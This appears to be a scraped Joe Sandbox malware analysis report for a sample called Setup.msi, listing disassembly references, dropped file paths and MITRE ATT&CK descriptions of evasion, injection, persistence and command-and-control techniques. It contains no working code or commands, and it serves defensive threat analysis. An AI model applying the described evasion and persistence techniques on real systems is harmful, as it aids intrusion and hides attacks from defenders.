EnterCriticalSection.KERNEL32(?,?,00007FF8A7C97EA7,?,?,?,?,?,?,?,?,00007FF8A7C21502), ref: 00007FF8A7C97C0C
LeaveCriticalSection.KERNEL32(?,?,00007FF8A7C97EA7,?,?,?,?,?,?,?,?,00007FF8A7C21502), ref: 00007FF8A7C97C16

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3a1490edba09e3a7becc86b2e09e5672a663190b4e9fac5deeb906d35fe4d6c1
Instruction ID: fc19383e10360a1c55f5a2383730138c014b812af5248aab092162ea22075edf
Opcode Fuzzy Hash: 3a1490edba09e3a7becc86b2e09e5672a663190b4e9fac5deeb906d35fe4d6c1
Instruction Fuzzy Hash: 1001DF22B0AA65A9E765AF23AC00A2E6750FF88FE9F856031DD0D07300CD3CE441A340

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\5924ee.rbs

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhtaww5n.s0n.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjzztiqa.lkm.ps1

C:\Users\user\AppData\Local\Temp\msi58CD.txt

C:\Users\user\AppData\Local\Temp\pss58D0.ps1

C:\Users\user\AppData\Local\Temp\scr58CE.ps1

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\BCUninstaller.exe

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\UnRar.exe

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-1-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-2-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-datetime-l1-1-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-debug-l1-1-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-errorhandling-l1-1-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-1-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-2-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l2-1-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-handle-l1-1-0.dll

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-heap-l1-1-0.dll

Windows Analysis Report
Setup.msi

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre